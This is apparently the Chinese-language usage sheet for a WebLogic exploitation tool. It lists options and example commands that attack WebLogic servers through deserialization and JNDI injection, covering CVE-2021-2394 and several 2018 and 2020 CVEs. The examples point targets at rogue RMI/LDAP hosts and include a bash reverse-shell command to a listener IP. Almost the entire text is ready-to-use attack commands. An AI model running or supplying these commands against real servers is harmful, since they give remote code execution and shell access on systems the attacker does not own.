工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能
公众号:8ypass
下载方式:公众号回复 weblogic
//特殊时期 无后门 随便测 不放心自己反编译一下自己看
java -jar weblogic tools.jar -help
-c <arg> execute commond 要执行的命令
-H <arg> Remote Host 目标主机
-help list options
-https <arg> https需选择此选项 T3S 目标是https选择此项
-jndi <arg> JNDI地址 weblogic JNDI注入选这项填入地址
-Jport <arg> JRMPListener监听 输入监听端口,在本机开启JRMPListener输
-os <arg> window/linux 目标主机系统 不选默认为window
-P <arg> Remote Port 目标主机端口
-payload <arg> payload grep 选择payload
-payloads list payloads 遍历可用payload
-RMIH <arg> JRMPClient Host JRMP服务端地址
-RMIP <arg> JRMPClient Port JRMP服务端端口
增加CVE-2021-2394
java -jar weblogic.jar -payloads
java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe
LDAP
java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618
RMI
java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'
java -jar weblogic tools.jar -Jport 8888 -payload cc6 -c calc.exe
0
java -jar weblogic tools.jar -H 192.168.0.112 -P 7001 -RMIH 192.168.0.110 -RMIP 8888 -payload 20183245
rmi:
java -jar weblogic tools.jar -jndi rmi://192.168.0.110:8888/wlc -payload 20183191 -H 192.168.0.112 -P 7001
ldap:
java -jar weblogic tools.jar -jndi ldap://192.168.0.110:9922/232 -payload 20183191 -H 192.168.0.112 -P 7001
java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -jndi ldap://127.0.0.1:8889/#wlc
java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -jndi rmi://127.0.0.1/wlc
java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -os window -mvel xxx
rmi:
java -jar weblogic tools.jar -H 192.168.0.113 -P 7001 -payload 20202551 -jndi rmi://192.168.0.113:8888/wlc
ldap:
java -jar weblogic tools.jar -H 192.168.0.113 -P 7001 -payload 20202551 -jndi ldap://192.168.0.113/#123
java -jar weblogic tools.jar -H 127.0.0.1 -P 7001 -payload 20212394 -jndi rmi://1.1.1.1:8888/wlc